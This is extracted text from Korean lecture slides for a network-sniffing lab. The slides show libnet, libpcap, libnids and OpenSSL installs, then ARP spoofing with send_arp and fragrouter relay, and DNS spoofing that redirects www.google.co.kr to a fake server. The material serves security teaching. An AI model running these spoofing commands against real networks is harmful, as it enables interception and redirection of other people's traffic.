Libnet Root configure Root make test Root make
실습 – Libnet 설치하기 Root#. /configure Root# make test Root# make install -7 -
1 -2. Libpcap (Library Packet Capture) -스니핑 프로그램에 필요한 라이브러리 - 네트워크 카드에 유입된 정보를 응용 프로그램이 읽을 수 있는 형 태로 전환 해 줌 운영체제 리눅스 솔라리스 4. x 라이브러리 Raw socket & LSF(Linux Socket Filter) NIT(Network Interface Tap) 솔라리스 DLPI(Data Link Provider Interface) BSD 계열 BPF(Berkely Packet Filter)의 PCAP(Packet Capture : libpcap) 윈도우 Winpcap 라이브러리 -8 -
실습 – Libpcap 설치하기 Root#. /configure Root# make install -9 -
실습 – Libnids 설치하기 Root#. /configure Root# make install - 11 -
실습 – Open. SSL 설치하기 Root#. /config Root# make test Root# make install - 13 -
실습 – ARP 스푸핑 공격 전 툴 설치 1. ARP 스푸핑 툴(fake 버전 1. 1. 2, rpm) Root# rpm -Uvh fake-1. 1. 2 -1. i 386. rpm 2. 패킷 Relay 툴(fragrouter 버전 1. 6) Root#. /configure Root# make 공격 전 ARP 테이블 Root# arp -a - 17 -
공격전 패킷 릴레이 기능 설정 Root# fragrouter –B 1 ARP 스푸핑 공격 실시 Root# send_arp 00: C 0: 26: 5 D: 25: AA 172. 16. 0. 3 00: 06: 5 B: 89: D 0: CC - 18 - 172. 16. 0. 4
공격 후 ARP 테이블 Root# arp -a 공격 중 Fragrouter - 19 -
실습 : DNS 스푸핑 공격하기 2 - win_dnsspoof 툴로 www. google. co. kr에 대한 DNS query 패킷에 대 해 위조된 웹 서버인 192. 168. 1. 143으로 이름이 해석되도록 설정 C: > win_dnsspoof -n www. google. co. kr -i 192. 168. 1. 143 -g 00: 04: 76: 6 E: FB: E 4 - 31 -
- Slides: 33